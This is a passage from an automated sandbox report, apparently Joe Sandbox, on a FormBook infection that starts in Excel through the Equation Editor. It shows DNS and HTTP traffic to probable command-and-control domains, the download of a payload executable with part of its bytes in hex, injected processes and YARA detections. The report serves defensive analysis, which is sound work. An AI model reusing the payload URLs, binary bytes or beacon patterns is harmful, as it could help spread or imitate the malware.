                                  Jun 10, 2021 15:26:27.789880037 CEST804916899.83.154.118192.168.2.22
                                  Jun 10, 2021 15:26:27.789932966 CEST804916899.83.154.118192.168.2.22
                                  Jun 10, 2021 15:26:27.790205956 CEST4916880192.168.2.2299.83.154.118
                                  Jun 10, 2021 15:26:27.790329933 CEST4916880192.168.2.2299.83.154.118
                                  Jun 10, 2021 15:26:27.818063974 CEST804916899.83.154.118192.168.2.22
                                  Jun 10, 2021 15:26:27.818197966 CEST4916880192.168.2.2299.83.154.118
                                  Jun 10, 2021 15:26:27.833020926 CEST804916899.83.154.118192.168.2.22

                                  UDP Packets

                                  TimestampSource PortDest PortSource IPDest IP
                                  Jun 10, 2021 15:26:08.598660946 CEST5219753192.168.2.228.8.8.8
                                  Jun 10, 2021 15:26:08.666162014 CEST53521978.8.8.8192.168.2.22
                                  Jun 10, 2021 15:26:13.789688110 CEST5309953192.168.2.228.8.8.8
                                  Jun 10, 2021 15:26:14.379901886 CEST53530998.8.8.8192.168.2.22
                                  Jun 10, 2021 15:26:20.068352938 CEST5283853192.168.2.228.8.8.8
                                  Jun 10, 2021 15:26:20.135004997 CEST53528388.8.8.8192.168.2.22
                                  Jun 10, 2021 15:26:27.473023891 CEST6120053192.168.2.228.8.8.8
                                  Jun 10, 2021 15:26:27.559887886 CEST53612008.8.8.8192.168.2.22
                                  Jun 10, 2021 15:26:32.791817904 CEST4954853192.168.2.228.8.8.8
                                  Jun 10, 2021 15:26:32.873641968 CEST53495488.8.8.8192.168.2.22

                                  DNS Queries

                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                  Jun 10, 2021 15:26:08.598660946 CEST192.168.2.228.8.8.80xccffStandard query (0)www.myfavbutik.comA (IP address)IN (0x0001)
                                  Jun 10, 2021 15:26:13.789688110 CEST192.168.2.228.8.8.80x2e78Standard query (0)www.69-1hn7uc.netA (IP address)IN (0x0001)
                                  Jun 10, 2021 15:26:20.068352938 CEST192.168.2.228.8.8.80x2f03Standard query (0)www.tricqr.comA (IP address)IN (0x0001)
                                  Jun 10, 2021 15:26:27.473023891 CEST192.168.2.228.8.8.80x3c4eStandard query (0)www.defenestration.worldA (IP address)IN (0x0001)
                                  Jun 10, 2021 15:26:32.791817904 CEST192.168.2.228.8.8.80x6ec7Standard query (0)www.buylocalclub.infoA (IP address)IN (0x0001)

                                  DNS Answers

                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                  Jun 10, 2021 15:26:08.666162014 CEST8.8.8.8192.168.2.220xccffNo error (0)www.myfavbutik.com172.67.161.4A (IP address)IN (0x0001)
                                  Jun 10, 2021 15:26:08.666162014 CEST8.8.8.8192.168.2.220xccffNo error (0)www.myfavbutik.com104.21.15.16A (IP address)IN (0x0001)
                                  Jun 10, 2021 15:26:14.379901886 CEST8.8.8.8192.168.2.220x2e78No error (0)www.69-1hn7uc.net163.43.122.104A (IP address)IN (0x0001)
                                  Jun 10, 2021 15:26:20.135004997 CEST8.8.8.8192.168.2.220x2f03Name error (3)www.tricqr.comnonenoneA (IP address)IN (0x0001)
                                  Jun 10, 2021 15:26:27.559887886 CEST8.8.8.8192.168.2.220x3c4eNo error (0)www.defenestration.world99.83.154.118A (IP address)IN (0x0001)
                                  Jun 10, 2021 15:26:32.873641968 CEST8.8.8.8192.168.2.220x6ec7Name error (3)www.buylocalclub.infononenoneA (IP address)IN (0x0001)

                                  HTTP Request Dependency Graph

                                  • 18.140.1.169
                                  • www.myfavbutik.com
                                  • www.69-1hn7uc.net
                                  • www.defenestration.world

                                  HTTP Packets

                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                  0192.168.2.224916518.140.1.16980C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                  TimestampkBytes transferredDirectionData
                                  Jun 10, 2021 15:24:50.574428082 CEST0OUTGET /ggs/doc.exe HTTP/1.1
                                  Accept: */*
                                  Accept-Encoding: gzip, deflate
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                  Host: 18.140.1.169
                                  Connection: Keep-Alive
                                  Jun 10, 2021 15:24:50.760368109 CEST1INHTTP/1.1 200 OK
                                  Date: Thu, 10 Jun 2021 13:24:50 GMT
                                  Server: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.7
                                  Last-Modified: Thu, 10 Jun 2021 09:42:41 GMT
                                  ETag: "f2a00-5c4663658bc88"
                                  Accept-Ranges: bytes
                                  Content-Length: 993792
                                  Keep-Alive: timeout=5, max=100
                                  Connection: Keep-Alive
                                  Content-Type: application/x-msdownload
                                  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 5b dd c1 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 1e 0f 00 00 0a 00 00 00 00 00 00 1a 3d 0f 00 00 20 00 00 00 40 0f 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 0f 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 c8 3c 0f 00 4f 00 00 00 00 40 0f 00 80 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 0f 00 0c 00 00 00 90 3b 0f 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 20 1d 0f 00 00 20 00 00 00 1e 0f 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 80 06 00 00 00 40 0f 00 00 08 00 00 00 20 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 0f 00 00 02 00 00 00 28 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fc 3c 0f 00 00 00 00 00 48 00 00 00 02 00 05 00 cc 54 01 00 a4 03 01 00 03 00 00 00 05 00 00 06 70 58 02 00 20 e3 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 30 02 00 1f 00 00 00 00 00 00 00 00 00 28 21 00 00 0a 28 22 00 00 0a 00 de 02 00 dc 00 28 0b 00 00 06 02 6f 23 00 00 0a 00 2a 00 01 10 00 00 02 00 01 00 0e 0f 00 02 00 00 00 00 aa 00 02 16 28 24 00 00 0a 00 02 16 28 25 00 00 0a 00 02 17 28 26 00 00 0a 00 02 16 28 27 00 00 0a 00 02 16 28 28 00 00 0a 00 2a 4e 00 02 28 0d 00 00 06 6f b9 02 00 06 28 29 00 00 0a 00 2a 26 00 02 28 2a 00 00 0a 00 2a ce 73 2b 00 00 0a 80 01 00 00 04 73 2c 00 00 0a 80 02 00 00 04 73 2d 00 00 0a 80 03 00 00 04 73 2e 00 00 0a 80 04 00 00 04 73 2f 00 00 0a 80 05 00 00 04 2a 00 00 00 13 30 01 00 10 00 00 00 01 00 00 11 00 7e 01 00 00 04 6f 30 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 02 00 00 11 00 7e 02 00 00 04 6f 31 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 03 00 00 11 00 7e 03 00 00 04 6f 32 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 04 00 00 11 00 7e 04 00 00 04 6f 33 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 05 00 00 11 00 7e 05 00 00 04 6f 34 00 00 0a 0a 2b 00 06 2a 26 00 02 28 35 00 00 0a 00 2a 00 00 13 30 02 00 3c 00 00 00 06 00 00 11 00 7e 06 00 00 04 14 28 36 00 00 0a 0b 07 2c 21 72 01 00 00 70 d0 06 00 00 02 28 37 00 00 0a 6f 38 00 00 0a 73 39 00 00 0a 0c 08 80 06 00 00 04 00 00 7e 06 00 00 04 0a 2b 00 06 2a 13 30 01 00 0b
                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL[`P= @@ @<O@`; H.text `.rsrc@ @@.reloc`(@B<HTpX 0(!("(o#*($(%(&('((*N(o()*&(**s+s,s-s.s/*0~o0+*0~o1+*0~o2+*0~o3+*0~o4+*&(5*0<~(6,!rp(7o8s9~+*0
                                  Jun 10, 2021 15:24:50.760406017 CEST3INData Raw: 00 00 00 07 00 00 11 00 7e 07 00 00 04 0a 2b 00 06 2a 22 00 02 80 07 00 00 04 2a 13 30 03 00 26 00 00 00 08 00 00 11 00 28 10 00 00 06 72 2f 00 00 70 7e 07 00 00 04 6f 3a 00 00 0a 28 3b 00 00 0a 0b 07 74 06 00 00 1b 0a 2b 00 06 2a 00 00 13 30 03
                                  Data Ascii: ~+*"*0&(r/p~o:(;t+*05(r7p~o:(;%-&*+*+*0<~(6,!r_p(7o8s9~+*0~+*"
                                  Jun 10, 2021 15:24:50.760427952 CEST4INData Raw: 2b 00 00 06 16 6f 58 00 00 0a 00 02 6f 2b 00 00 06 16 6f 59 00 00 0a 00 02 6f 2d 00 00 06 06 72 93 01 00 70 6f 51 00 00 0a 74 71 00 00 01 6f 5a 00 00 0a 00 02 6f 2d 00 00 06 06 72 c1 01 00 70 6f 51 00 00 0a 74 71 00 00 01 6f 52 00 00 0a 00 02 6f
                                  Data Ascii: +oXo+oYo-rpoQtqoZo-rpoQtqoRo- sSoTo-rpoUo-c}sVoWo-oXo-oYo/rpoQtqoRo/ sSoTo/r!poUo/
                                  Jun 10, 2021 15:24:50.760449886 CEST5INData Raw: 06 6f 63 00 00 0a 00 02 28 62 00 00 0a 02 6f 31 00 00 06 6f 63 00 00 0a 00 02 28 62 00 00 0a 02 6f 2f 00 00 06 6f 63 00 00 0a 00 02 28 62 00 00 0a 02 6f 2d 00 00 06 6f 63 00 00 0a 00 02 28 62 00 00 0a 02 6f 2b 00 00 06 6f 63 00 00 0a 00 02 72 af
                                  Data Ascii: oc(bo1oc(bo/oc(bo-oc(bo+ocrp(Urpodo+oeo-oeo/oeo1oe(f(g*&{+*07Csh{,oi}{,oj
                                  Jun 10, 2021 15:24:50.760472059 CEST7INData Raw: b7 6f 87 00 00 0a 0d 02 08 28 86 00 00 0a b7 08 28 86 00 00 0a b7 6f 87 00 00 0a 13 04 11 04 6f 88 00 00 0a 00 07 18 5d 17 fe 01 13 05 11 05 2c 16 09 11 04 28 55 00 00 06 13 06 03 11 06 6f 83 00 00 0a 00 00 2b 15 00 11 04 09 28 55 00 00 06 13 07
                                  Data Ascii: o((oo],(Uo+(Uoozooozo>Z*0o}+ds(~}Ys{Yo+((-oI
                                  Jun 10, 2021 15:24:50.760493994 CEST8INData Raw: 64 7d 2f 00 00 04 2a c6 02 28 48 00 00 0a 02 02 fe 06 67 00 00 06 73 a6 00 00 0a 28 a7 00 00 0a 02 02 fe 06 68 00 00 06 73 68 00 00 0a 28 a8 00 00 0a 02 28 72 00 00 06 2a 4a 00 28 0d 00 00 06 6f bc 02 00 06 6f a9 00 00 0a 00 2a 00 00 00 13 30 04
                                  Data Ascii: d}/*(Hgs(hsh((r*J(oo*0$o(Zoo~"{${.(oo((~"{$|)((oo~"{${-(oo~"{${+
                                  Jun 10, 2021 15:24:50.760515928 CEST10INData Raw: 0a 6f 57 00 00 0a 00 02 6f 79 00 00 06 1a 6f 5c 00 00 0a 00 02 6f 79 00 00 06 72 af 03 00 70 6f bb 00 00 0a 00 02 6f 79 00 00 06 17 6f bc 00 00 0a 00 02 6f 7b 00 00 06 20 21 03 00 00 20 4b 01 00 00 73 53 00 00 0a 6f 54 00 00 0a 00 02 6f 7b 00 00
                                  Data Ascii: oWoyo\oyrpooyoo{ ! KsSoTo{r~poUo{ 9sVoWo{o\o{rpoo{oo}o[o}*nsSoTo}rupoUo}sVoWo}o\
                                  Jun 10, 2021 15:24:50.760539055 CEST11INData Raw: 00 00 0a 00 02 6f 95 00 00 06 20 90 00 00 00 1f 16 73 53 00 00 0a 6f 54 00 00 0a 00 02 6f 95 00 00 06 72 c0 09 00 70 6f 55 00 00 0a 00 02 6f 95 00 00 06 1f 40 1f 2e 73 56 00 00 0a 6f 57 00 00 0a 00 02 6f 95 00 00 06 1f 13 6f 5c 00 00 0a 00 02 6f
                                  Data Ascii: o sSoTorpoUo@.sVoWoo\orpoooosSoTorpoUo@.sVoWoo\orpoooo nsSoTor
                                  Jun 10, 2021 15:24:50.760562897 CEST12INData Raw: 0b 07 2c 07 07 06 6f 69 00 00 0a 02 03 7d 5f 00 00 04 02 7b 5f 00 00 04 0b 07 2c 07 07 06 6f 6a 00 00 0a 2a 26 02 7b 60 00 00 04 2b 00 2a 00 00 00 13 30 02 00 37 00 00 00 28 00 00 11 02 fe 06 65 00 00 06 73 68 00 00 0a 0a 02 7b 60 00 00 04 0b 07
                                  Data Ascii: ,oi}_{_,oj*&{`+*07(esh{`,oi}`{`,oj*&{a+*"}a*&{b+*"}b*&{c+*"}c*&{d+*"}d*&{e+*07(msh{e,o
                                  Jun 10, 2021 15:24:50.760586023 CEST14INData Raw: e9 00 00 06 00 02 73 4e 00 00 0a 6f eb 00 00 06 00 02 73 4e 00 00 0a 6f ed 00 00 06 00 02 73 4e 00 00 0a 6f ef 00 00 06 00 02 73 4e 00 00 0a 6f f1 00 00 06 00 02 73 4e 00 00 0a 6f f3 00 00 06 00 02 73 4d 00 00 0a 6f f5 00 00 06 00 02 73 4e 00 00
                                  Data Ascii: sNosNosNosNosNosMosNosososMosMosNosMosososo(Po H6sSoTorypoU
                                  Jun 10, 2021 15:24:50.946381092 CEST15INData Raw: 17 6f 5b 00 00 0a 00 02 6f bc 00 00 06 20 80 01 00 00 20 41 01 00 00 73 53 00 00 0a 6f 54 00 00 0a 00 02 6f bc 00 00 06 72 3e 09 00 70 6f 55 00 00 0a 00 02 6f bc 00 00 06 1f 39 1f 0d 73 56 00 00 0a 6f 57 00 00 0a 00 02 6f bc 00 00 06 1f 0e 6f 5c
                                  Data Ascii: o[o AsSoTor>poUo9sVoWoo\orpo]oo[o ^sSoTorpoUo8sVoWoo\orpo]oo[o |sS


                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                  1192.168.2.2249166172.67.161.480C:\Windows\explorer.exe
                                  TimestampkBytes transferredDirectionData
                                  Jun 10, 2021 15:26:08.719491959 CEST1049OUTGET /p2io/?9rx=dKp6rERGX1oMTEkAtHZ5ksFEU2G9ncFkpMVxqDe1xbP28bbT8N8SqGfKoZnot7fJ59eAsw==&1bPx7=ifrhEpc0Hv8pf4 HTTP/1.1
                                  Host: www.myfavbutik.com
                                  Connection: close
                                  Data Raw: 00 00 00 00 00 00 00
                                  Data Ascii:
                                  Jun 10, 2021 15:26:08.786259890 CEST1049INHTTP/1.1 301 Moved Permanently
                                  Date: Thu, 10 Jun 2021 13:26:08 GMT
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Cache-Control: max-age=3600
                                  Expires: Thu, 10 Jun 2021 14:26:08 GMT
                                  Location: https://www.doibutik.com/
                                  cf-request-id: 0a97b3147400002c26721e3000000001
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=WHL10s8h5lxUBs6r3PTMAs9RyAthKjHb5DfYToZHsaU6Txx9e6MhsdCQC7L3a3YgpjnC4ITL1%2FotlYU5J9IZHO%2FJho7KJY7IzofrZctNyRrcnTKrLlRWypudSjsKAtXd"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 65d2ee00bf712c26-FRA
                                  alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                  2192.168.2.2249167163.43.122.10480C:\Windows\explorer.exe
                                  TimestampkBytes transferredDirectionData
                                  Jun 10, 2021 15:26:14.692687035 CEST1050OUTGET /p2io/?9rx=V9Q6YNEpmTTku3594j8RVRt0udPCykKEN/raiLh+TizfOzW/z4mr+TojY495qvgWXqOzag==&1bPx7=ifrhEpc0Hv8pf4 HTTP/1.1
                                  Host: www.69-1hn7uc.net
                                  Connection: close
                                  Data Raw: 00 00 00 00 00 00 00
                                  Data Ascii:
                                  Jun 10, 2021 15:26:15.013705969 CEST1051INHTTP/1.1 302 Found
                                  Date: Thu, 10 Jun 2021 13:26:13 GMT
                                  Server: Apache/2.2.13 (Unix)
                                  Location: http://www.69-1hn7uc.net/notfound?9rx=V9Q6YNEpmTTku3594j8RVRt0udPCykKEN/raiLh+TizfOzW/z4mr+TojY495qvgWXqOzag==&1bPx7=ifrhEpc0Hv8pf4
                                  Content-Length: 319
                                  Connection: close
                                  Content-Type: text/html; charset=iso-8859-1
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 36 39 2d 31 68 6e 37 75 63 2e 6e 65 74 2f 6e 6f 74 66 6f 75 6e 64 3f 39 72 78 3d 56 39 51 36 59 4e 45 70 6d 54 54 6b 75 33 35 39 34 6a 38 52 56 52 74 30 75 64 50 43 79 6b 4b 45 4e 2f 72 61 69 4c 68 2b 54 69 7a 66 4f 7a 57 2f 7a 34 6d 72 2b 54 6f 6a 59 34 39 35 71 76 67 57 58 71 4f 7a 61 67 3d 3d 26 61 6d 70 3b 31 62 50 78 37 3d 69 66 72 68 45 70 63 30 48 76 38 70 66 34 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://www.69-1hn7uc.net/notfound?9rx=V9Q6YNEpmTTku3594j8RVRt0udPCykKEN/raiLh+TizfOzW/z4mr+TojY495qvgWXqOzag==&amp;1bPx7=ifrhEpc0Hv8pf4">here</a>.</p></body></html>


                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                  3192.168.2.224916899.83.154.11880C:\Windows\explorer.exe
                                  TimestampkBytes transferredDirectionData
                                  Jun 10, 2021 15:26:27.605036020 CEST1052OUTGET /p2io/?9rx=lrOqxb+UJCh0p+XgaZ1tkMjkgx31NOkXgmck/5zOeb61pSaxp+mpU6ffv/qKl6HzQ2hiJA==&1bPx7=ifrhEpc0Hv8pf4 HTTP/1.1
                                  Host: www.defenestration.world
                                  Connection: close
                                  Data Raw: 00 00 00 00 00 00 00
                                  Data Ascii:
                                  Jun 10, 2021 15:26:27.789880037 CEST1052INHTTP/1.1 403 Forbidden
                                  Date: Thu, 10 Jun 2021 13:26:27 GMT
                                  Content-Type: text/html
                                  Content-Length: 146
                                  Connection: close
                                  Server: nginx
                                  Vary: Accept-Encoding
                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                  Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                  Code Manipulations

                                  Statistics

                                  CPU Usage

                                  Click to jump to process

                                  Memory Usage

                                  Click to jump to process

                                  High Level Behavior Distribution

                                  Click to dive into process behavior distribution

                                  Behavior

                                  Click to jump to process

                                  System Behavior

                                  Analysis Process: EXCEL.EXE PID: 2404 Parent PID: 584

                                  General

                                  Start time:15:23:49
                                  Start date:10/06/2021
                                  Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  Wow64 process (32bit):false
                                  Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                  Imagebase:0x13f380000
                                  File size:27641504 bytes
                                  MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high

                                  Chronological Activities

                                  Analysis Process: EQNEDT32.EXE PID: 2676 Parent PID: 584

                                  General

                                  Start time:15:24:12
                                  Start date:10/06/2021
                                  Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                  Wow64 process (32bit):true
                                  Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                  Imagebase:0x400000
                                  File size:543304 bytes
                                  MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high

                                  Chronological Activities

                                  Analysis Process: vbc.exe PID: 2792 Parent PID: 2676

                                  General

                                  Start time:15:24:14
                                  Start date:10/06/2021
                                  Path:C:\Users\Public\vbc.exe
                                  Wow64 process (32bit):true
                                  Commandline:'C:\Users\Public\vbc.exe'
                                  Imagebase:0x1000000
                                  File size:993792 bytes
                                  MD5 hash:15D907E7D9F8286E5053796C9D78FCEC
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:.Net C# or VB.NET
                                  Yara matches:
                                  • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.2172328721.000000000252C000.00000004.00000001.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.2172726786.0000000003509000.00000004.00000001.sdmp, Author: Joe Security
                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.2172726786.0000000003509000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.2172726786.0000000003509000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                  Antivirus matches:
                                  • Detection: 100%, Joe Sandbox ML
                                  • Detection: 15%, ReversingLabs
                                  Reputation:low

                                  Chronological Activities

                                  Analysis Process: vbc.exe PID: 2440 Parent PID: 2792

                                  General

                                  Start time:15:24:19
                                  Start date:10/06/2021
                                  Path:C:\Users\Public\vbc.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Users\Public\vbc.exe
                                  Imagebase:0x1000000
                                  File size:993792 bytes
                                  MD5 hash:15D907E7D9F8286E5053796C9D78FCEC
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2208251364.0000000000530000.00000040.00000001.sdmp, Author: Joe Security
                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2208251364.0000000000530000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2208251364.0000000000530000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2208195189.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2208195189.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2208195189.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.2169946011.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.2169946011.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.2169946011.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2208158353.00000000003B0000.00000040.00000001.sdmp, Author: Joe Security
                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2208158353.00000000003B0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2208158353.00000000003B0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                  Reputation:low

                                  Chronological Activities

                                  Analysis Process: explorer.exe PID: 1388 Parent PID: 2440

                                  General

                                  Start time:15:24:21
                                  Start date:10/06/2021
                                  Path:C:\Windows\explorer.exe
                                  Wow64 process (32bit):false
                                  Commandline:
                                  Imagebase:0xffca0000
                                  File size:3229696 bytes
                                  MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.2199605074.0000000002945000.00000040.00000001.sdmp, Author: Joe Security
                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.2199605074.0000000002945000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.2199605074.0000000002945000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                  Reputation:high

                                  Chronological Activities

                                  Analysis Process: ipconfig.exe PID: 3036 Parent PID: 1388

                                  General

                                  Start time:15:24:34
                                  Start date:10/06/2021
                                  Path:C:\Windows\SysWOW64\ipconfig.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Windows\SysWOW64\ipconfig.exe
                                  Imagebase:0x590000
                                  File size:27136 bytes
                                  MD5 hash:CABB20E171770FF64614A54C1F31C033
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2377936853.00000000001D0000.00000004.00000001.sdmp, Author: Joe Security
                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2377936853.00000000001D0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2377936853.00000000001D0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2377810691.0000000000080000.00000040.00000001.sdmp, Author: Joe Security
                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2377810691.0000000000080000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2377810691.0000000000080000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
